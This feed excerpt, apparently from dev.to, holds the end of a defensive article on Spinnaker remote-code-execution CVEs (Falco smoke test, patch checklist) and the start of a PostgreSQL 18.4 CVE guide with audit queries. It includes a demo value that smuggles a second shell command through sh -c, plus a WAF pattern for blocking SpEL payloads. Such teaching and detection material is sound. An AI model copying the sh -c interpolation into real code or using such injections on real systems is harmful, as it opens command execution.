  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;spinnaker&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;cve-2026-32604&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;rce&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
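&lt;p&gt;A rule that has never fired in testing is hard to trust. The sketch below is a hypothetical smoke test for the Echo rule: it spawns a harmless &lt;code&gt;sh&lt;/code&gt; inside the Echo container, which the rule should report as CRITICAL, provided the container's image repository contains &lt;code&gt;spinnaker/echo&lt;/code&gt; (if your images come from a registry path without that substring, adjust the condition first). Setting &lt;code&gt;KUBECTL=echo&lt;/code&gt; turns it into a dry run that only prints the command.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical smoke test for the "Spinnaker Echo unexpected subprocess" rule.
KUBECTL="${KUBECTL:-kubectl}"

# falco_smoke_echo: spawn a harmless shell inside the Echo container; Falco should
# then log a CRITICAL "Spinnaker Echo spawned suspicious process" event.
falco_smoke_echo() {
  $KUBECTL exec -n spinnaker deploy/spin-echo -- sh -c 'echo falco-smoke-test'
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The Clouddriver rule cannot be exercised the same way: it requires &lt;code&gt;proc.pname = "java"&lt;/code&gt;, and a process started through &lt;code&gt;kubectl exec&lt;/code&gt; is not a child of the Clouddriver JVM, so that rule is better validated on a staging instance where the JVM itself spawns the test process.&lt;/p&gt;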



&lt;h2&gt;
  
  
  8. ManoIT Internal Checklist — 4 Spinnaker Instances × 9 Phases
&lt;/h2&gt;

&lt;p&gt;The operational checklist below condenses the previous six sections. ManoIT runs four Spinnaker instances across a multi-cloud, multi-region environment, and patching all of them took about 36 hours.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done When&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory current versions of all Spinnaker instances&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 instances × version table merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Immediately deploy the workaround &lt;code&gt;echo.pipelinetriggers.artifacts.enabled: false&lt;/code&gt; to every Echo instance&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 Echo deploys rolled out&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Immediately deploy &lt;code&gt;artifacts.gitrepo.enabled: false&lt;/code&gt; to every Clouddriver instance&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 Clouddriver deploys rolled out&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Inventory pipelines using artifact / git/repo — identify affected triggers&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Affected pipeline inventory PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Route affected pipeline triggers via Jenkins/GitLab CI calling the Spinnaker API&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;First green workaround build&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Upgrade 2 Operator instances to 2026.1.0&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Both expose new version metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Upgrade 1 Helm instance to 2026.1.0&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;helm get values shows spinnakerVersion=2026.1.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Backport-patch 1 Halyard instance to 2025.4.2 (Operator migration as separate PR)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;hal version shows 2025.4.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Revert the workarounds on each instance (set artifacts.enabled / gitrepo.enabled back to true)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;First green artifact-triggered auto-build&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Regression check — identify legitimate pipelines from SpEL block logs and migrate&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Block counter at 0 or allowlist-add PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Deploy 3 Prometheus alerts (SpinnakerVulnerableVersion, EchoSpelBlockSpike, ClouddriverGitrepoInvalidRef)&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Alert fire/resolve test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Add 3 Loki LogQL dashboard panels&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Grafana dashboard merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Deploy 2 Falco rules (Echo unexpected subprocess, Clouddriver gitrepo unexpected child)&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Rule fires on sample exploit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Retroactive 1-week scan of Echo/Clouddriver logs for exploit indicators&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Investigation report merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Rotate cloud keys held by Spinnaker (preemptive assume-breach)&lt;/td&gt;
&lt;td&gt;Infra&lt;/td&gt;
&lt;td&gt;AWS / GCP / Azure key rotation complete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Review RBAC — clean up &lt;code&gt;APPLICATION_OWNER&lt;/code&gt; holders&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Permission matrix PR merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;Add WAF rules in front of Spinnaker Gate — block SpEL payload pattern (&lt;code&gt;T\(java\.&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;WAF deployed; bypass attempts rejected at the gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;Write operational RFC — Spinnaker security patch SLA (workaround within 24h, patch within 7d of disclosure)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;RFC merged, reflected in quarterly security review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — The Operational Cost of Ambiguous Trust Boundaries in Distributed Systems
&lt;/h2&gt;

&lt;p&gt;The April 20, 2026 Spinnaker CVEs deliver a clear message: &lt;strong&gt;"Even microservices built by the same organization must consistently enforce standard defenses — trusted class allowlists, input validation — on a per-service basis."&lt;/strong&gt; Orca has used a safe SpEL context for five years; Echo went five years without the same protection. Other Clouddriver artifact downloaders (http, s3, gcs) used the ProcessBuilder argv array directly; only the gitrepo downloader retained the &lt;code&gt;sh -c&lt;/code&gt; path. Both are the result of &lt;strong&gt;inconsistency across "different modules in the same codebase."&lt;/strong&gt;&lt;/p&gt;
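
&lt;p&gt;The difference between passing an argv array and going through &lt;code&gt;sh -c&lt;/code&gt; is easy to see in a few lines. This sketch uses Python's &lt;code&gt;subprocess&lt;/code&gt; in place of Java's &lt;code&gt;ProcessBuilder&lt;/code&gt; (Clouddriver itself is Java) and &lt;code&gt;printf&lt;/code&gt; in place of &lt;code&gt;git&lt;/code&gt;. The ref value is a hypothetical attacker-controlled input. It illustrates the bug class only; it is not Clouddriver's actual code.&lt;/p&gt;

```python
import subprocess

# Hypothetical attacker-controlled value, e.g. a git ref copied from an artifact definition
REF = "main; echo INJECTED"


def run_argv(value: str) -> str:
    # argv array: the value reaches printf as one literal argument; no shell ever parses it
    result = subprocess.run(["printf", "%s", value], capture_output=True, text=True, check=True)
    return result.stdout


def run_sh_c(value: str) -> str:
    # sh -c with string interpolation: the shell splits on ';' and runs a second command
    result = subprocess.run(["sh", "-c", f"printf %s {value}"], capture_output=True, text=True, check=True)
    return result.stdout


print(repr(run_argv(REF)))  # 'main; echo INJECTED'
print(repr(run_sh_c(REF)))  # 'mainINJECTED\n'
```

&lt;p&gt;The argv version treats the semicolon as data. The &lt;code&gt;sh -c&lt;/code&gt; version executes the injected &lt;code&gt;echo&lt;/code&gt;, and that second command is the foothold an attacker needs.&lt;/p&gt;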

&lt;p&gt;Three operational reminders to close with: (1) &lt;strong&gt;assume the patch window equals the PoC window&lt;/strong&gt; — the same-day patch on April 20 and the next-day ZeroPath PoC are exactly that case. Pre-commit to an SLA that deploys workarounds within 24 hours and patches within 7 days of disclosure. (2) &lt;strong&gt;allowlist patches can break legitimate behavior&lt;/strong&gt; — actively harvest SpEL block logs for one week after patching and prepare migrations for legitimate pipelines. (3) &lt;strong&gt;RCE must be paired with cloud key rotation&lt;/strong&gt; — Spinnaker Clouddriver is the single store of multi-cloud credentials, so even without evidence of compromise, the standard is to rotate keys under the assume-breach principle. The 18-item checklist in §8 is these three principles unrolled into operational procedure, and the shortest one-line recommendation from this article is: &lt;em&gt;"Deploy §4 workarounds today; apply the §5 patches this week."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;ⓘ This article was authored by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) using the Spinnaker GHSA-69rw-45wj-g4v6 (CVE-2026-32613) and same-date CVE-2026-32604 security advisories — published April 20, 2026 — as primary sources. Versions, patch lines, and workaround procedures reflect the official guidance as of the publication date (2026-05-26) and may change with subsequent Spinnaker security team notices. Verify current state at spinnaker/spinnaker GitHub Security Advisories and spinnaker.io/docs release notes before applying in production. Internal case examples are adapted from ManoIT Platform Team's internal RFC.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1477684" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>security</category>
      <category>gitops</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 22 May 2026 00:41:15 +0000</pubDate>
      <link>https://dev.to/x4nent/postgresql-184-deep-dive-11-cve-patches-iouring-async-io-3x-faster-oauth-20-uuidv7-and-57da</link>
      <guid>https://dev.to/x4nent/postgresql-184-deep-dive-11-cve-patches-iouring-async-io-3x-faster-oauth-20-uuidv7-and-57da</guid>
      <description>&lt;h1&gt;
  
  
  PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints
&lt;/h1&gt;

&lt;p&gt;On May 14, 2026, the PostgreSQL Global Development Group released &lt;strong&gt;18.4&lt;/strong&gt; alongside 17.10, 16.14, 15.18, and 14.23. On the surface it looks like the fourth minor update on the 18 line, but the contents make it effectively a &lt;strong&gt;"security major"&lt;/strong&gt;. The same day's security advisory closed &lt;strong&gt;11 CVEs&lt;/strong&gt; in one go — four of them at CVSS 8.8 (&lt;em&gt;High&lt;/em&gt;), one allowing &lt;strong&gt;remote code execution&lt;/strong&gt; via a stack buffer overflow in &lt;code&gt;refint&lt;/code&gt; (&lt;code&gt;CVE-2026-6637&lt;/code&gt;), and another exposing a &lt;strong&gt;timing channel that lets attackers recover credentials&lt;/strong&gt; from the MD5 password comparison code (&lt;code&gt;CVE-2026-6478&lt;/code&gt;). It's the kind of release where an operator needs to decide on the same page whether to patch now or wait until next week.&lt;/p&gt;

&lt;p&gt;At the same time, the five structural changes PostgreSQL 18 (GA in September 2025) brought — io_uring-backed async I/O (2–3x read throughput), native &lt;strong&gt;OAuth 2.0 authentication&lt;/strong&gt; in &lt;code&gt;pg_hba.conf&lt;/code&gt;, the timestamp-ordered &lt;code&gt;uuidv7()&lt;/code&gt; function, &lt;strong&gt;Virtual Generated Columns&lt;/strong&gt; as the new default, and &lt;strong&gt;Temporal Constraints&lt;/strong&gt; (&lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; / &lt;code&gt;PERIOD&lt;/code&gt;) — have now arrived in a &lt;em&gt;stabilized&lt;/em&gt; form through the 18.4 patch line. This post starts with a priority matrix for all 11 CVEs, then walks through the &lt;code&gt;postgresql.conf&lt;/code&gt; changes that most often trip up a 17 → 18 major upgrade, the &lt;code&gt;pg_hba.conf&lt;/code&gt; patterns for connecting OAuth to Microsoft Entra ID, Okta, and Keycloak, measurements for each of the three &lt;code&gt;io_method&lt;/code&gt; options (&lt;code&gt;sync&lt;/code&gt;, &lt;code&gt;worker&lt;/code&gt;, &lt;code&gt;io_uring&lt;/code&gt;), and the 12-step verification sequence ManoIT applied to internal RDS and on-prem PostgreSQL 18 clusters.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 14, 2026 is an Inflection Point for Database Operations
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18 went GA on September 25, 2025, with 18.1 arriving in November 2025 and 18.4 on May 14, 2026. What makes 18.4 different is the convergence of three things: (a) &lt;em&gt;11 CVEs closed in a single release&lt;/em&gt;, (b) &lt;em&gt;60+ post-GA stabilization bug fixes landing at the same time&lt;/em&gt;, and (c) &lt;em&gt;18-era features like OAuth and io_uring now maturing through real patch cycles&lt;/em&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2025.09.25&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.0 GA — async I/O, OAuth, uuidv7, virtual gen cols, temporal constraints&lt;/td&gt;
&lt;td&gt;Major features arrive; only early adopters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.11.13&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, 13.23&lt;/td&gt;
&lt;td&gt;First minor on the 18 line — initial bug stabilization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02.12&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.2, 17.8, 16.12, 15.16, 14.21&lt;/td&gt;
&lt;td&gt;Final patch window for the 13 line&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.08&lt;/td&gt;
&lt;td&gt;PostgreSQL 13 EOL — no further patches&lt;/td&gt;
&lt;td&gt;13 workloads must migrate to 14+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026.05.14&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;PostgreSQL 18.4 + 17.10 + 16.14 + 15.18 + 14.23 — 11 CVEs patched simultaneously&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Security patch required across every supported track&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.14&lt;/td&gt;
&lt;td&gt;Same day: 60+ bug fixes backported&lt;/td&gt;
&lt;td&gt;autovacuum, logical replication, partitioning, pg_dump stability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.11 (expected)&lt;/td&gt;
&lt;td&gt;PostgreSQL 19.0 beta expected to begin&lt;/td&gt;
&lt;td&gt;18 enters its long stable phase&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two takeaways for operators: (1) &lt;em&gt;the 13 line went EOL on May 8 and 18.4 arrived six days later, forcing "13 → 17 direct migration" timelines&lt;/em&gt;, and (2) &lt;em&gt;at least four of the 11 CVEs trigger from external attack surface&lt;/em&gt; (an attacker only needing socket-level connection, or a low-privilege DB user). This is not a maintenance-window-of-convenience patch; it's a "do not push to the next quarter" patch.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The 11 CVE Priority Matrix — Which Attack Surfaces Closed
&lt;/h2&gt;

&lt;p&gt;The 18.4 release notes detail seven core CVEs in the security advisory; the remaining four are memory-safety duplicates rolled into them. The four you read first are all CVSS 8.8, and among them &lt;code&gt;refint&lt;/code&gt;'s stack buffer overflow is the &lt;strong&gt;only RCE triggerable by a low-privilege DB user&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;CVSS&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Summary&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6473&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Multiple built-in functions — memory allocator&lt;/td&gt;
&lt;td&gt;Integer underflow allocates undersized buffer → out-of-bounds write&lt;/td&gt;
&lt;td&gt;Normal DB user with SQL execute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6475&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pg_basebackup&lt;/code&gt; / &lt;code&gt;pg_rewind&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Symlink following — origin superuser overwrites client-side files&lt;/td&gt;
&lt;td&gt;Origin superuser + backup/restore command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6477&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Server superuser code paths&lt;/td&gt;
&lt;td&gt;Server superuser overwrites client process stack memory&lt;/td&gt;
&lt;td&gt;Server superuser + client RTT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6637&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;refint&lt;/code&gt; extension&lt;/td&gt;
&lt;td&gt;Stack buffer overflow → arbitrary code execution + SQL injection&lt;/td&gt;
&lt;td&gt;Low-privilege DB user + &lt;code&gt;refint&lt;/code&gt; trigger&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6478&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5.9&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;MD5 password comparison&lt;/td&gt;
&lt;td&gt;Covert timing channel — credentials recoverable&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;md5&lt;/code&gt; authentication in use (scram-sha-256 safe)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6479&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;7.5&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;SSL / GSS negotiation&lt;/td&gt;
&lt;td&gt;Uncontrolled recursion → sustained DoS&lt;/td&gt;
&lt;td&gt;Anyone who can connect to a PostgreSQL socket (no auth required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6476&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ALTER SUBSCRIPTION ... REFRESH PUBLICATION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Schema/relation names unquoted in SQL → arbitrary SQL on publisher&lt;/td&gt;
&lt;td&gt;Subscriber owner&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.1 CVE-2026-6637 — refint Stack Buffer Overflow (Low-Privilege RCE)
&lt;/h3&gt;

&lt;p&gt;The most dangerous of the 11 is &lt;strong&gt;CVE-2026-6637&lt;/strong&gt;. &lt;code&gt;refint&lt;/code&gt; is a legacy foreign-key integrity trigger module in PostgreSQL's &lt;code&gt;contrib/spi&lt;/code&gt;, written in the &lt;em&gt;late 1990s before native foreign keys existed&lt;/em&gt;. It still ships with the distribution, and some legacy schemas still use its triggers. Before 18.4, these triggers passed column names and SQL identifiers through an internal stack buffer that could overflow, letting a &lt;strong&gt;low-privilege DB user execute arbitrary code and perform SQL injection&lt;/strong&gt;. It is the &lt;em&gt;only&lt;/em&gt; one of the 11 CVEs that turns into RCE under a regular user's privileges, so clusters with any &lt;code&gt;refint&lt;/code&gt; footprint must patch &lt;em&gt;first&lt;/em&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Check whether refint is in use anywhere in the cluster&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nspname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;schema_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;function_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="k"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;relname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgname&lt;/span&gt;  &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;pg_trigger&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_proc&lt;/span&gt;    &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgfoid&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_namespace&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pronamespace&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_class&lt;/span&gt;   &lt;span class="k"&gt;c&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgrelid&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt;  &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proname&lt;/span&gt; &lt;span class="k"&gt;IN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'check_primary_key'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'check_foreign_key'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
   &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgisinternal&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Any row of output means: patch to 18.4 immediately,&lt;/span&gt;
&lt;span class="c1"&gt;-- then migrate to standard foreign keys.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 CVE-2026-6478 — MD5 Password Timing Channel
&lt;/h3&gt;

&lt;p&gt;Second in importance: &lt;strong&gt;CVE-2026-6478&lt;/strong&gt;. The server-side comparison between the client's MD5 response and the value the server derives from the stored hash used &lt;em&gt;byte-by-byte short-circuit comparison&lt;/em&gt;. That leaves a covert timing channel that lets attackers estimate how many leading bytes match. PostgreSQL has supported &lt;code&gt;scram-sha-256&lt;/code&gt; since version 10 (2017) and made it the default &lt;code&gt;password_encryption&lt;/code&gt; in version 14 (2021). Late migrators, clusters keeping &lt;code&gt;md5&lt;/code&gt; for legacy compatibility, and clusters that explicitly set &lt;code&gt;password_encryption=md5&lt;/code&gt; are all still in scope.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Find users still using MD5 authentication&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;rolname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="k"&gt;CASE&lt;/span&gt;
         &lt;span class="k"&gt;WHEN&lt;/span&gt; &lt;span class="n"&gt;rolpassword&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'md5%'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt; &lt;span class="s1"&gt;'md5 (vulnerable)'&lt;/span&gt;
         &lt;span class="k"&gt;WHEN&lt;/span&gt; &lt;span class="n"&gt;rolpassword&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'SCRAM-SHA-256%'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt; &lt;span class="s1"&gt;'scram-sha-256 (safe)'&lt;/span&gt;
         &lt;span class="k"&gt;ELSE&lt;/span&gt; &lt;span class="s1"&gt;'plain/unknown'&lt;/span&gt;
       &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;auth_type&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;pg_authid&lt;/span&gt;
